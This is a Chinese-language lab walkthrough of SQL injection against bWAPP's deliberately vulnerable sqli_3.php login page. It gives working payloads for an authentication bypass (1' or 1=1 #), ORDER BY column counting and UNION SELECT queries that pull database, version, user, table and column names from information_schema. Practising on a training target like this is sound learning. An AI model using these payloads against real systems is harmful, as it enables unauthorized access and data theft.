SQL注入之bWAPP之sqli_3.php

1、首先在login框中输入一个单引号看看有什么结果，结果如图：



仔细一看，报错内容中的“AND”前有四个单引号，说明我们输入的一个单引号正好和代码前的单引号闭合了。
2、尝试构造万能密码，尝试输入
“login=1' or 1=1 --+
&password=
&form=submit”，好像不对，在尝试输入
“login=1' or 1=1 #+
&password=
&form=submit”，对了，结果如图：



3、判断字段数并查看显示位：
输入“login=1' order by 5 #+”，报“Error: Unknown column '5' in 'order clause'”，输入“login=1' order by 4 #+”，报“Invalid credentials!”，说明字段是4，结果如图：





输入“login=-1' union select 1,2,3,4 #+”，结果如图：



4、查看数据库等信息：
输入“login=-1' union select 1,database(),3,group_concat(version(),"||",user()) #+”，得知数据库名为Bwapp，结果如图：



5、查询表名：
输入“login=-1' union select 1,database(),3,table_name from information_schema.tables where table_schema='Bwapp' #+”，得知表名为Blog，结果如图：



6、查询字段名：
输入“login=-1' union select 1,database(),3,column_name from information_schema.columns where table_name='Blog' #+”，得知字段名为Id，结果如图：



7、查询字段内容：
输入“login=-1' union select 1,database(),3,id from Blog #+”，没有数据。